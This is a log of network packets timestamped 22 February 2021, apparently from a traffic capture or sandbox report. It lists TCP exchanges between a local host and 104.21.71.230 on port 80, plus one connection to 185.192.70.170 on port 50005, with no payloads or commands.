                                                                                                                                                                Feb 22, 2021 07:46:01.702856064 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.000669003 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000698090 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000715971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000731945 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000747919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000763893 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.000782013 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.000806093 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.001046896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001065969 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001082897 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001100063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001112938 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.001121044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001140118 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.001143932 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.001188993 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.002029896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002051115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002069950 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002089024 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002099037 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.002134085 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.002135992 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002155066 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002207994 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.002942085 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002959967 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002979994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.002993107 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003006935 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.003029108 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.003509998 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003540039 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003556967 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003573895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003590107 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003607035 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.003608942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.003659964 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.004381895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004401922 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004420042 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004432917 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004450083 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004466057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.004467964 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.004508018 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.005332947 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.005352020 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.005410910 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.006372929 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006396055 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006407976 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006422043 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006486893 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006500959 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.006503105 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.006551027 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.884833097 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:02.931916952 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.953874111 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.953910112 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.953927040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.953939915 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:02.954019070 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115426064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115459919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115479946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115497112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115513086 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115531921 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115544081 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115572929 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115619898 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115834951 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115855932 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115873098 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115890026 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115919113 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.115921021 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115961075 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.115967989 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.116012096 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.116694927 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.116719007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.116735935 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.116753101 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.116775990 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.116823912 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.118458986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118482113 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118499041 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118515015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118530989 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118541956 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.118551016 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118583918 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.118604898 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.118904114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118923903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118941069 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118958950 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118972063 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.118977070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118997097 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.118998051 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.119048119 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.119812965 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.119834900 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.119849920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.120117903 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.121634007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.121659040 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.121680021 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.121696949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.121709108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.121725082 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.121726990 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122014046 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122034073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122051001 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122059107 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.122068882 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122070074 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.122086048 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122097969 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.122106075 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122138977 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.122975111 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.122996092 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.123016119 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.125520945 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125545979 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125560999 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125596046 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.125670910 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125670910 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.125690937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125706911 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125722885 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125741005 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125744104 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.125760078 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.125787973 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.125811100 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.126661062 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.126682043 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.126741886 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.445836067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445866108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445882082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445898056 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445914030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445933104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.445954084 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.445993900 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.446208954 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446228981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446245909 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446268082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446280003 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.446295023 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446307898 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.446325064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.446372032 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.447165966 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447191000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447205067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447237968 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.447525978 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447566032 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447582006 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447592020 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.447611094 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.447635889 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.457896948 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.457921028 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.457937002 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.457953930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.457972050 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.457988024 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.458005905 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458033085 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.458277941 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458296061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458321095 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.458508968 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458534002 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458559036 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.458590984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458610058 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458627939 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.458636045 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458652973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.458679914 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.466527939 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466555119 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466576099 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466593027 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466609001 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466619968 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.466636896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466655970 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.466825962 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466845036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466860056 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466866970 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.466883898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466897964 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466911077 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.466974020 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.467783928 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.467808962 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.467853069 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.474776030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474802971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474819899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474832058 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.474850893 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474860907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.474879026 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474896908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.474955082 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.475008011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475035906 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475056887 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475066900 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.475100040 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475111008 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.475133896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475155115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.475195885 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.476062059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.476102114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.476115942 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.476133108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.476149082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.476169109 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.481578112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481607914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481626034 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481641054 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.481662035 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481678009 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481695890 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.481709003 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.481760979 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.482059002 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482080936 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482105017 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.482115984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482137918 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482151031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482162952 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482199907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.482800961 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482831955 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482848883 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482857943 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.482873917 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.482893944 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:04.483428955 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:04.483484030 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:05.193841934 CET4972450005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:46:07.745496035 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:08.022222042 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:08.334716082 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:08.895494938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:08.895529032 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:08.895555019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912823915 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912856102 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912872076 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912890911 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912909031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912924051 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.912926912 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.912956953 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.912987947 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.913140059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.913172960 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.913193941 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.913212061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.913220882 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.913225889 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.913254023 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.914325953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914375067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914393902 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914434910 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914460897 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914464951 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.914493084 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914532900 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.914752007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914772034 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914781094 CET4972680192.168.2.5104.21.71.230
